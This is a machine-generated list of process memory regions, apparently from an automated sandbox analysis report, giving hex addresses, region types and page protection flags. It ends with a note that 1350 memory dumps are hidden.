55B0000
heap
page execute and read and write
6BEE000
trusted library allocation
page read and write
7290000
trusted library allocation
page read and write
60E3000
heap
page read and write
8110000
heap
page read and write
682F000
heap
page read and write
43C7000
heap
page read and write
34A1000
heap
page read and write
32FB000
stack
page read and write
70F000
stack
page read and write
2AC7000
heap
page read and write
7E86000
heap
page read and write
89C0000
heap
page read and write
617E000
trusted library allocation
page read and write
7312000
heap
page read and write
4CE4000
trusted library allocation
page read and write
6E42000
heap
page read and write
8CD1000
trusted library allocation
page read and write
65E9000
trusted library allocation
page read and write
72F0000
trusted library allocation
page read and write
6561000
heap
page read and write
34A1000
heap
page read and write
6960000
trusted library allocation
page read and write
7CD0000
trusted library allocation
page read and write
60CE000
heap
page read and write
7F6000
heap
page read and write
682F000
heap
page read and write
438F000
trusted library allocation
page read and write
7E3D000
stack
page read and write
2E3E000
stack
page read and write
7090000
trusted library allocation
page read and write
4AEC000
stack
page read and write
6671000
heap
page read and write
6A8D000
stack
page read and write
89B0000
heap
page read and write
52F0000
heap
page read and write
6831000
heap
page read and write
60D6000
heap
page read and write
754E000
stack
page read and write
6181000
trusted library allocation
page read and write
6836000
heap
page read and write
5590000
trusted library allocation
page read and write
484E000
stack
page read and write
6809000
heap
page read and write
5808000
heap
page read and write
7270000
trusted library allocation
page read and write
4EBE000
stack
page read and write
3569000
heap
page read and write
705000
heap
page read and write
57F8000
heap
page read and write
60E8000
heap
page read and write
688F000
heap
page read and write
76B0000
trusted library allocation
page read and write
4E90000
trusted library allocation
page read and write
617E000
trusted library allocation
page read and write
2A65000
heap
page read and write
43A0000
heap
page read and write
57D4000
heap
page read and write
7E50000
trusted library allocation
page read and write
4C5E000
heap
page read and write
6671000
heap
page read and write
58A9000
trusted library allocation
page read and write
3554000
heap
page read and write
5FCC000
heap
page read and write
6779000
heap
page read and write
685B000
heap
page read and write
8B19000
heap
page read and write
4370000
trusted library allocation
page execute and read and write
617A000
trusted library allocation
page read and write
7EF0000
trusted library allocation
page read and write
34DF000
heap
page read and write
6C0E000
trusted library allocation
page read and write
2CE0000
heap
page read and write
6846000
heap
page read and write
812B000
stack
page read and write
347E000
unkown
page read and write
639000
stack
page read and write
51EE000
stack
page read and write
6B3B000
stack
page read and write
50FE000
stack
page read and write
32E0000
heap
page read and write
806E000
stack
page read and write
7348000
heap
page read and write
53FE000
stack
page read and write
719E000
stack
page read and write
77FB000
stack
page read and write
682D000
heap
page read and write
7ED000
heap
page read and write
6BEE000
trusted library allocation
page read and write
29B5000
trusted library allocation
page execute and read and write
48E4000
trusted library allocation
page read and write
36BC000
heap
page read and write
2A34000
trusted library allocation
page read and write
2984000
trusted library allocation
page read and write
650000
heap
page read and write
6500000
trusted library allocation
page read and write
57C3000
heap
page read and write
712E000
stack
page read and write
67CD000
heap
page read and write
3570000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
6081000
heap
page read and write
6863000
heap
page read and write
3691000
heap
page read and write
2AFF000
heap
page read and write
1550000
heap
page read and write
2911000
heap
page read and write
6FBE000
stack
page read and write
5FD3000
heap
page read and write
42D0000
trusted library allocation
page read and write
543E000
stack
page read and write
6083000
heap
page read and write
58C0000
heap
page read and write
617E000
trusted library allocation
page read and write
60CC000
heap
page read and write
60C9000
heap
page read and write
72A0000
trusted library allocation
page read and write
4CDE000
heap
page read and write
6A90000
trusted library allocation
page read and write
57C0000
heap
page read and write
3572000
heap
page read and write
60DB000
heap
page read and write
4CCE000
stack
page read and write
60D6000
heap
page read and write
291B000
heap
page read and write
2A40000
trusted library allocation
page read and write
2A5A000
trusted library allocation
page execute and read and write
2AAE000
heap
page read and write
2D80000
trusted library allocation
page read and write
5623000
trusted library allocation
page read and write
680E000
heap
page read and write
74E000
stack
page read and write
6BEE000
trusted library allocation
page read and write
67FD000
heap
page read and write
609E000
heap
page read and write
2AC3000
heap
page read and write
30F0000
heap
page read and write
2A3F000
heap
page read and write
6DEB000
stack
page read and write
2AE4000
heap
page read and write
71FD000
stack
page read and write
2A3D000
trusted library allocation
page execute and read and write
6F95000
heap
page read and write
770000
heap
page read and write
7C8000
heap
page read and write
6C0E000
trusted library allocation
page read and write
CF0000
direct allocation
page read and write
60D6000
heap
page read and write
7E60000
heap
page read and write
6082000
heap
page read and write
67F8000
heap
page read and write
4CED000
heap
page read and write
7BEA000
heap
page read and write
8B20000
heap
page read and write
5581000
trusted library allocation
page read and write
4C71000
heap
page read and write
354E000
heap
page read and write
7BDD000
heap
page read and write
764D000
stack
page read and write
6834000
heap
page read and write
6227000
trusted library allocation
page read and write
60A3000
heap
page read and write
4380000
trusted library allocation
page read and write
79EE000
stack
page read and write
2FC0000
heap
page read and write
7DD000
heap
page read and write
4CD0000
heap
page execute and read and write
6831000
heap
page read and write
6188000
trusted library allocation
page read and write
702D000
heap
page read and write
7EA0000
trusted library allocation
page read and write
733C000
heap
page read and write
60DB000
heap
page read and write
79AE000
stack
page read and write
2960000
heap
page read and write
6817000
heap
page read and write
54A5000
heap
page execute and read and write
792000
heap
page read and write
4C0E000
stack
page read and write
6E4E000
stack
page read and write
6826000
heap
page read and write
35E0000
heap
page read and write
73E1000
heap
page read and write
7DBE000
stack
page read and write
6C0E000
trusted library allocation
page read and write
6E2E000
stack
page read and write
7170000
heap
page read and write
682F000
heap
page read and write
623B000
trusted library allocation
page read and write
60C9000
heap
page read and write
6C40000
heap
page read and write
6185000
trusted library allocation
page read and write
69CB000
stack
page read and write
79F000
heap
page read and write
67F4000
heap
page read and write
35A0000
trusted library allocation
page read and write
2D40000
heap
page read and write
3500000
heap
page read and write
617E000
trusted library allocation
page read and write
67BE000
heap
page read and write
72D0000
trusted library allocation
page read and write
60E9000
heap
page read and write
6F03000
heap
page read and write
34D3000
heap
page read and write
7E30000
heap
page read and write
2AC6000
heap
page read and write
2947000
heap
page read and write
7ED0000
trusted library allocation
page read and write
5F80000
heap
page read and write
6F64000
heap
page read and write
5ED6000
heap
page read and write
6BEE000
trusted library allocation
page read and write
601E000
stack
page read and write
4CF1000
heap
page read and write
7A5000
heap
page read and write
3558000
heap
page read and write
4C4E000
stack
page read and write
7CD0000
trusted library allocation
page read and write
5090000
heap
page read and write
70AE000
stack
page read and write
6C0E000
trusted library allocation
page read and write
42D8000
trusted library allocation
page read and write
2968000
heap
page read and write
505B000
trusted library allocation
page read and write
60D8000
heap
page read and write
790000
heap
page read and write
7D00000
trusted library allocation
page read and write
7B10000
direct allocation
page read and write
360A000
heap
page read and write
7BFE000
heap
page read and write
7C08000
heap
page read and write
289E000
stack
page read and write
7DFF000
stack
page read and write
14C000
stack
page read and write
4EC2000
trusted library allocation
page read and write
6181000
trusted library allocation
page read and write
3553000
heap
page read and write
731A000
heap
page read and write
681B000
heap
page read and write
6FA2000
heap
page read and write
7EB0000
trusted library allocation
page read and write
4FA0000
trusted library allocation
page read and write
7AD0000
direct allocation
page read and write
6080000
heap
page read and write
6C0E000
trusted library allocation
page read and write
617E000
trusted library allocation
page read and write
2A37000
heap
page read and write
6C0E000
trusted library allocation
page read and write
436E000
stack
page read and write
4C69000
heap
page read and write
4BCE000
stack
page read and write
5808000
heap
page read and write
354C000
heap
page read and write
60D8000
heap
page read and write
67F8000
heap
page read and write
5FC1000
heap
page read and write
2A18000
heap
page read and write
7021000
heap
page read and write
6BEE000
trusted library allocation
page read and write
6842000
heap
page read and write
354C000
heap
page read and write
3565000
heap
page read and write
2A0C000
heap
page read and write
6A30000
heap
page execute and read and write
67C7000
heap
page read and write
6822000
heap
page read and write
8E30000
trusted library allocation
page read and write
6BBB000
stack
page read and write
51F6000
trusted library allocation
page read and write
2A1E000
stack
page read and write
7720000
trusted library allocation
page read and write
6826000
heap
page read and write
4F5C000
stack
page read and write
88FD000
trusted library allocation
page read and write
6E84000
heap
page read and write
6B4D000
stack
page read and write
2960000
trusted library allocation
page read and write
5E70000
heap
page read and write
81F0000
trusted library allocation
page read and write
6679000
heap
page read and write
625C000
stack
page read and write
6846000
heap
page read and write
6181000
trusted library allocation
page read and write
2D90000
trusted library allocation
page read and write
681B000
heap
page read and write
4CE2000
heap
page read and write
4D47000
heap
page read and write
5808000
heap
page read and write
7CC7000
trusted library allocation
page read and write
7700000
trusted library allocation
page read and write
713E000
stack
page read and write
66BA000
heap
page read and write
6826000
heap
page read and write
2DA0000
trusted library allocation
page read and write
6C7E000
stack
page read and write
2D2F000
stack
page read and write
8CC0000
trusted library allocation
page read and write
4AF0000
trusted library allocation
page read and write
67C7000
heap
page read and write
6185000
trusted library allocation
page read and write
6FC9000
heap
page read and write
6D7F000
stack
page read and write
682D000
heap
page read and write
67F8000
heap
page read and write
57E9000
heap
page read and write
355E000
heap
page read and write
76A0000
trusted library allocation
page read and write
2D94000
trusted library allocation
page read and write
680000
heap
page read and write
609C000
heap
page read and write
67CC000
heap
page read and write
4DB5000
trusted library allocation
page read and write
7E80000
trusted library allocation
page read and write
3585000
trusted library allocation
page execute and read and write
6181000
trusted library allocation
page read and write
2CB0000
heap
page read and write
676A000
trusted library allocation
page read and write
355B000
heap
page read and write
6173000
trusted library allocation
page read and write
78C000
heap
page read and write
6177000
trusted library allocation
page read and write
60E5000
heap
page read and write
5E71000
heap
page read and write
28E0000
heap
page read and write
70F0000
heap
page read and write
6C0E000
trusted library allocation
page read and write
29B2000
trusted library allocation
page read and write
76C0000
trusted library allocation
page read and write
6028000
heap
page read and write
4CE1000
heap
page read and write
4C70000
heap
page read and write
67F4000
heap
page read and write
6846000
heap
page read and write
10FE000
stack
page read and write
6831000
heap
page read and write
7D4D000
stack
page read and write
8A30000
trusted library allocation
page read and write
6C0E000
trusted library allocation
page read and write
617C000
trusted library allocation
page read and write
7C5C000
heap
page read and write
7CBE000
stack
page read and write
5FCA000
heap
page read and write
6185000
trusted library allocation
page read and write
5716000
trusted library allocation
page read and write
343E000
unkown
page read and write
5CE9000
trusted library allocation
page read and write
60E5000
heap
page read and write
50D1000
trusted library allocation
page read and write
8B41000
heap
page read and write
6846000
heap
page read and write
8AE5000
heap
page read and write
4CEC000
heap
page read and write
8345000
trusted library allocation
page read and write
5070000
heap
page read and write
2FB0000
heap
page read and write
698D000
stack
page read and write
607F000
heap
page read and write
773E000
stack
page read and write
2E9D000
heap
page read and write
853C000
stack
page read and write
6071000
heap
page read and write
65C1000
trusted library allocation
page read and write
5808000
heap
page read and write
7E90000
trusted library allocation
page read and write
6DAD000
stack
page read and write
55C1000
trusted library allocation
page read and write
7342000
heap
page read and write
6870000
heap
page read and write
357A000
trusted library allocation
page execute and read and write
6128000
heap
page read and write
4581000
trusted library allocation
page read and write
7730000
trusted library allocation
page read and write
70F0000
trusted library section
page read and write
4DB8000
trusted library allocation
page read and write
4B00000
trusted library allocation
page read and write
2A53000
heap
page read and write
47A6000
heap
page read and write
7300000
trusted library allocation
page read and write
CF6000
direct allocation
page read and write
36C7000
heap
page read and write
681B000
heap
page read and write
6826000
heap
page read and write
2C90000
heap
page read and write
3554000
heap
page read and write
777B000
stack
page read and write
367F000
stack
page read and write
5881000
trusted library allocation
page read and write
6175000
trusted library allocation
page read and write
7D90000
heap
page read and write
55C0000
trusted library allocation
page read and write
4CF7000
trusted library allocation
page read and write
6166000
heap
page read and write
6C0E000
trusted library allocation
page read and write
684B000
heap
page read and write
34A0000
heap
page read and write
67CF000
heap
page read and write
60DB000
heap
page read and write
7015000
heap
page read and write
63E0000
trusted library allocation
page read and write
42BE000
stack
page read and write
4CDB000
heap
page read and write
4CF3000
heap
page read and write
685B000
heap
page read and write
4DD6000
trusted library allocation
page read and write
7070000
trusted library allocation
page read and write
6846000
heap
page read and write
67FD000
heap
page read and write
6746000
heap
page read and write
69E000
stack
page read and write
686B000
heap
page read and write
6834000
heap
page read and write
3619000
heap
page read and write
584B000
heap
page read and write
6185000
trusted library allocation
page read and write
81EC000
trusted library allocation
page read and write
547E000
stack
page read and write
60D6000
heap
page read and write
76BE000
stack
page read and write
28E9000
heap
page read and write
1280000
heap
page read and write
67C9000
heap
page read and write
6773000
trusted library allocation
page read and write
4DA2000
trusted library allocation
page read and write
8AD2000
heap
page read and write
6DEE000
stack
page read and write
88E0000
trusted library allocation
page execute and read and write
35D0000
trusted library allocation
page execute and read and write
7CF0000
trusted library allocation
page execute and read and write
3540000
heap
page read and write
8CB0000
trusted library allocation
page execute and read and write
6081000
heap
page read and write
7A1000
heap
page read and write
344E000
stack
page read and write
356B000
heap
page read and write
6166000
heap
page read and write
67F4000
heap
page read and write
750E000
stack
page read and write
67EC000
heap
page read and write
7BC5000
heap
page read and write
760E000
stack
page read and write
6741000
heap
page read and write
4DAF000
trusted library allocation
page read and write
4DE6000
trusted library allocation
page read and write
7D8E000
stack
page read and write
29D8000
heap
page read and write
2AA3000
heap
page read and write
6220000
trusted library allocation
page read and write
67F4000
heap
page read and write
2A4B000
heap
page read and write
4881000
trusted library allocation
page read and write
763E000
stack
page read and write
2A79000
heap
page read and write
767F000
stack
page read and write
3568000
heap
page read and write
6075000
heap
page read and write
6185000
trusted library allocation
page read and write
6831000
heap
page read and write
6FFF000
stack
page read and write
8A90000
heap
page read and write
8A20000
trusted library allocation
page read and write
5AA0000
trusted library allocation
page read and write
67C9000
heap
page read and write
715E000
stack
page read and write
58E8000
trusted library allocation
page read and write
3657000
heap
page read and write
6185000
trusted library allocation
page read and write
E3D000
stack
page read and write
1B0000
heap
page read and write
5FC1000
heap
page read and write
7BF8000
heap
page read and write
6822000
heap
page read and write
6185000
trusted library allocation
page read and write
2A17000
heap
page read and write
298D000
trusted library allocation
page execute and read and write
3540000
trusted library allocation
page read and write
5013000
trusted library allocation
page read and write
7DBE000
stack
page read and write
7DEE000
stack
page read and write
67C7000
heap
page read and write
563F000
stack
page read and write
6E30000
heap
page execute and read and write
67FD000
heap
page read and write
67D0000
heap
page read and write
47A4000
heap
page read and write
6490000
heap
page read and write
25EE000
stack
page read and write
2A4A000
heap
page read and write
685B000
heap
page read and write
6B28000
trusted library allocation
page read and write
57F0000
heap
page read and write
4F43000
trusted library allocation
page read and write
2A1B000
heap
page read and write
88D0000
heap
page read and write
7D10000
trusted library allocation
page read and write
2A6C000
stack
page read and write
6675000
heap
page read and write
2A65000
heap
page read and write
6E7E000
stack
page read and write
28DE000
stack
page read and write
3559000
heap
page read and write
4CFF000
trusted library allocation
page read and write
6667000
heap
page read and write
2A53000
heap
page read and write
6B8D000
stack
page read and write
6181000
trusted library allocation
page read and write
2A01000
heap
page read and write
4C8F000
stack
page read and write
4C5F000
trusted library allocation
page read and write
2E60000
heap
page read and write
6817000
heap
page read and write
5850000
heap
page read and write
4C50000
heap
page read and write
72D0000
trusted library allocation
page read and write
7FB88000
trusted library allocation
page execute and read and write
5D09000
trusted library allocation
page read and write
682D000
heap
page read and write
4570000
heap
page execute and read and write
57DC000
heap
page read and write
79E000
heap
page read and write
60AE000
heap
page read and write
816E000
stack
page read and write
6185000
trusted library allocation
page read and write
6A10000
trusted library allocation
page read and write
6ACA000
stack
page read and write
6826000
heap
page read and write
2A01000
heap
page read and write
7B3000
heap
page read and write
7040000
heap
page execute and read and write
2AEF000
heap
page read and write
694D000
stack
page read and write
7650000
trusted library allocation
page read and write
7C6C000
heap
page read and write
6E35000
heap
page execute and read and write
6F7B000
stack
page read and write
7F6000
heap
page read and write
2A53000
heap
page read and write
7F7000
heap
page read and write
70A0000
trusted library allocation
page read and write
2B34000
heap
page read and write
7CB0000
heap
page read and write
7680000
trusted library allocation
page read and write
2A4A000
heap
page read and write
70EE000
stack
page read and write
68FD000
stack
page read and write
7D5000
heap
page read and write
6BD0000
heap
page read and write
703B000
heap
page read and write
682D000
heap
page read and write
76D0000
trusted library allocation
page read and write
2927000
heap
page read and write
6166000
heap
page read and write
7D2000
heap
page read and write
6173000
trusted library allocation
page read and write
1287000
heap
page read and write
60D6000
heap
page read and write
67F8000
heap
page read and write
7F4000
heap
page read and write
45E3000
trusted library allocation
page read and write
4B30000
trusted library allocation
page read and write
323C000
stack
page read and write
6822000
heap
page read and write
327D000
stack
page read and write
7005000
heap
page read and write
57B1000
heap
page read and write
7710000
trusted library allocation
page read and write
7D20000
heap
page read and write
71DE000
stack
page read and write
684B000
heap
page read and write
69C0000
trusted library allocation
page read and write
4A8E000
stack
page read and write
329000
stack
page read and write
685B000
heap
page read and write
75E000
stack
page read and write
2900000
heap
page read and write
4C91000
heap
page read and write
8AF5000
heap
page read and write
60E9000
heap
page read and write
7260000
trusted library allocation
page read and write
6846000
heap
page read and write
7019000
heap
page read and write
5808000
heap
page read and write
4CDD000
heap
page read and write
6C0E000
trusted library allocation
page read and write
607C000
heap
page read and write
60C9000
heap
page read and write
7E60000
trusted library allocation
page read and write
6A0F000
stack
page read and write
33F0000
heap
page read and write
718D000
stack
page read and write
2FF5000
heap
page read and write
5D80000
heap
page read and write
60E7000
heap
page read and write
684B000
heap
page read and write
33F5000
heap
page read and write
8EA0000
trusted library allocation
page read and write
47A0000
heap
page read and write
6846000
heap
page read and write
2976000
heap
page read and write
6836000
heap
page read and write
60E5000
heap
page read and write
6BEE000
trusted library allocation
page read and write
758E000
stack
page read and write
6BEE000
trusted library allocation
page read and write
4F08000
trusted library allocation
page read and write
2920000
heap
page read and write
35E8000
heap
page read and write
54EE000
stack
page read and write
6D7E000
stack
page read and write
5ED6000
heap
page read and write
2AC1000
heap
page read and write
2A33000
trusted library allocation
page execute and read and write
6BEE000
trusted library allocation
page read and write
2DC0000
trusted library allocation
page read and write
6822000
heap
page read and write
4EC0000
trusted library allocation
page read and write
6171000
trusted library allocation
page read and write
6C0E000
trusted library allocation
page read and write
615B000
stack
page read and write
2AD0000
heap
page read and write
7DFE000
stack
page read and write
4380000
trusted library allocation
page read and write
57CC000
heap
page read and write
6C0E000
trusted library allocation
page read and write
7F6000
heap
page read and write
6BEE000
trusted library allocation
page read and write
6C0E000
trusted library allocation
page read and write
2BD0000
heap
page read and write
58E5000
heap
page read and write
57D9000
heap
page read and write
57AF000
stack
page read and write
6C0E000
trusted library allocation
page read and write
673F000
heap
page read and write
6671000
heap
page read and write
6836000
heap
page read and write
617C000
trusted library allocation
page read and write
4C87000
trusted library allocation
page read and write
478E000
stack
page read and write
2FE0000
heap
page read and write
2CE7000
heap
page read and write
6AFC000
stack
page read and write
81E0000
trusted library allocation
page read and write
6BEE000
trusted library allocation
page read and write
6DBF000
stack
page read and write
6842000
heap
page read and write
60DB000
heap
page read and write
2DC7000
trusted library allocation
page execute and read and write
29EE000
heap
page read and write
2A40000
heap
page read and write
7230000
trusted library allocation
page read and write
2DE0000
heap
page read and write
6C0E000
trusted library allocation
page read and write
7670000
trusted library allocation
page read and write
7E40000
heap
page read and write
4B2E000
stack
page read and write
617E000
trusted library allocation
page read and write
6EEF000
heap
page read and write
2A35000
heap
page read and write
7335000
heap
page read and write
682F000
heap
page read and write
698B000
stack
page read and write
6F89000
heap
page read and write
6185000
trusted library allocation
page read and write
60C9000
heap
page read and write
147F000
stack
page read and write
6836000
heap
page read and write
682F000
heap
page read and write
60E5000
heap
page read and write
6863000
heap
page read and write
6673000
heap
page read and write
6F3E000
stack
page read and write
6BEE000
trusted library allocation
page read and write
5650000
heap
page read and write
6181000
trusted library allocation
page read and write
4F50000
trusted library allocation
page read and write
60C9000
heap
page read and write
6836000
heap
page read and write
67CD000
heap
page read and write
7CC0000
trusted library allocation
page execute and read and write
7240000
trusted library allocation
page read and write
2A4A000
heap
page read and write
5300000
heap
page read and write
2E8E000
heap
page read and write
685B000
heap
page read and write
2DA9000
trusted library allocation
page read and write
7280000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
6831000
heap
page read and write
7D00000
trusted library allocation
page execute and read and write
4EFE000
stack
page read and write
4425000
heap
page execute and read and write
6C0E000
trusted library allocation
page read and write
5FCC000
heap
page read and write
5808000
heap
page read and write
71D0000
heap
page read and write
4870000
heap
page execute and read and write
6450000
trusted library allocation
page read and write
7270000
trusted library allocation
page read and write
2970000
trusted library allocation
page read and write
6739000
heap
page read and write
501E000
stack
page read and write
492F000
trusted library allocation
page read and write
682D000
heap
page read and write
6842000
heap
page read and write
80AE000
stack
page read and write
6846000
heap
page read and write
357A000
heap
page read and write
57E1000
heap
page read and write
708C000
stack
page read and write
684B000
heap
page read and write
4DF4000
trusted library allocation
page read and write
7E40000
trusted library allocation
page read and write
617A000
trusted library allocation
page read and write
465000
heap
page read and write
356B000
heap
page read and write
684C000
heap
page read and write
4CBF000
trusted library allocation
page read and write
67FD000
heap
page read and write
72DB000
trusted library allocation
page read and write
2CBA000
heap
page read and write
8B16000
heap
page read and write
2A37000
heap
page read and write
6224000
trusted library allocation
page read and write
6BEE000
trusted library allocation
page read and write
2966000
heap
page read and write
34E3000
heap
page read and write
2A65000
heap
page read and write
425000
stack
page read and write
47AF000
heap
page read and write
6F54000
heap
page read and write
5808000
heap
page read and write
684B000
heap
page read and write
7DF000
heap
page read and write
682F000
heap
page read and write
617C000
trusted library allocation
page read and write
6C0000
heap
page read and write
2F4B000
stack
page read and write
2A20000
trusted library allocation
page read and write
6753000
trusted library allocation
page read and write
2A9F000
heap
page read and write
681B000
heap
page read and write
60D6000
heap
page read and write
55A9000
trusted library allocation
page read and write
60E1000
heap
page read and write
354C000
heap
page read and write
609C000
heap
page read and write
3565000
heap
page read and write
7D7F000
stack
page read and write
7F6000
heap
page read and write
4318000
trusted library allocation
page read and write
685B000
heap
page read and write
36BE000
heap
page read and write
2A9C000
heap
page read and write
2990000
heap
page read and write
2BCE000
stack
page read and write
3560000
trusted library allocation
page read and write
6834000
heap
page read and write
7009000
heap
page read and write
7FB70000
trusted library allocation
page execute and read and write
3550000
trusted library allocation
page read and write
6108000
heap
page read and write
6BEE000
trusted library allocation
page read and write
5A25000
trusted library allocation
page read and write
34FE000
stack
page read and write
2A50000
trusted library allocation
page read and write
6826000
heap
page read and write
2A53000
heap
page read and write
6181000
trusted library allocation
page read and write
353E000
heap
page read and write
340D000
stack
page read and write
355D000
trusted library allocation
page execute and read and write
6B7E000
stack
page read and write
730B000
heap
page read and write
4D4B000
heap
page read and write
7200000
trusted library allocation
page execute and read and write
6185000
trusted library allocation
page read and write
7031000
heap
page read and write
8220000
heap
page read and write
67FD000
heap
page read and write
6181000
trusted library allocation
page read and write
2B27000
heap
page read and write
7A1000
heap
page read and write
4C65000
heap
page read and write
6842000
heap
page read and write
46D7000
trusted library allocation
page read and write
2A65000
trusted library allocation
page execute and read and write
2999000
trusted library allocation
page read and write
682D000
heap
page read and write
6858000
heap
page read and write
6181000
trusted library allocation
page read and write
685B000
heap
page read and write
5D69000
trusted library allocation
page read and write
580000
heap
page read and write
6C0E000
trusted library allocation
page read and write
617A000
trusted library allocation
page read and write
622B000
trusted library allocation
page read and write
6836000
heap
page read and write
6A2D000
stack
page read and write
51AE000
stack
page read and write
6C0E000
trusted library allocation
page read and write
6185000
trusted library allocation
page read and write
685B000
heap
page read and write
2F2C000
heap
page read and write
6C0E000
trusted library allocation
page read and write
7AF0000
direct allocation
page read and write
67BE000
heap
page read and write
4F1E000
stack
page read and write
67BE000
heap
page read and write
7260000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
67BB000
heap
page read and write
6BEE000
trusted library allocation
page read and write
685B000
heap
page read and write
456C000
stack
page read and write
2A60000
heap
page readonly
D10000
direct allocation
page read and write
5C7E000
stack
page read and write
7FCF0000
trusted library allocation
page execute and read and write
60D6000
heap
page read and write
6185000
trusted library allocation
page read and write
8B31000
heap
page read and write
452E000
stack
page read and write
6846000
heap
page read and write
67F4000
heap
page read and write
4D4C000
heap
page read and write
682D000
heap
page read and write
2A09000
heap
page read and write
7230000
trusted library allocation
page execute and read and write
8200000
trusted library allocation
page read and write
66BA000
heap
page read and write
6C6000
heap
page read and write
6185000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
6764000
trusted library allocation
page read and write
6D1F000
stack
page read and write
896D000
stack
page read and write
6F50000
trusted library allocation
page read and write
52EE000
stack
page read and write
4CD8000
heap
page read and write
7A8000
heap
page read and write
60D6000
heap
page read and write
6C0E000
trusted library allocation
page read and write
67FD000
heap
page read and write
70ED000
stack
page read and write
6817000
heap
page read and write
2A60000
trusted library allocation
page read and write
6741000
heap
page read and write
680A000
heap
page read and write
617C000
trusted library allocation
page read and write
6C0E000
trusted library allocation
page read and write
8150000
heap
page read and write
6741000
heap
page read and write
65B3000
heap
page read and write
7E75000
heap
page read and write
354C000
heap
page read and write
2DF0000
trusted library allocation
page read and write
5077000
heap
page read and write
2E50000
trusted library allocation
page execute and read and write
7C42000
heap
page read and write
60E5000
heap
page read and write
6BEE000
trusted library allocation
page read and write
2A1E000
stack
page read and write
6BEE000
trusted library allocation
page read and write
290D000
heap
page read and write
7080000
trusted library allocation
page read and write
6F40000
heap
page read and write
CB0000
direct allocation
page read and write
6831000
heap
page read and write
6D6E000
stack
page read and write
6817000
heap
page read and write
29D0000
trusted library allocation
page read and write
4AEE000
trusted library allocation
page read and write
353B000
heap
page read and write
2930000
heap
page read and write
353B000
heap
page read and write
285E000
stack
page read and write
7EC0000
trusted library allocation
page read and write
7060000
trusted library allocation
page read and write
6175000
trusted library allocation
page read and write
36B6000
heap
page read and write
356B000
heap
page read and write
42C0000
heap
page readonly
7CC0000
trusted library allocation
page read and write
60E1000
heap
page read and write
81DE000
stack
page read and write
6836000
heap
page read and write
4A0000
heap
page read and write
4E9A000
heap
page read and write
66EA000
heap
page read and write
29EE000
heap
page read and write
67C7000
heap
page read and write
28B0000
heap
page read and write
34A7000
heap
page read and write
4FF8000
trusted library allocation
page read and write
685B000
heap
page read and write
7D7E000
stack
page read and write
3579000
heap
page read and write
3582000
trusted library allocation
page read and write
43ED000
stack
page read and write
67F8000
heap
page read and write
60CB000
heap
page read and write
2ACE000
stack
page read and write
6836000
heap
page read and write
A6E000
stack
page read and write
54BE000
stack
page read and write
2FF0000
heap
page read and write
6831000
heap
page read and write
There are 1350 hidden memdumps, click here to show them.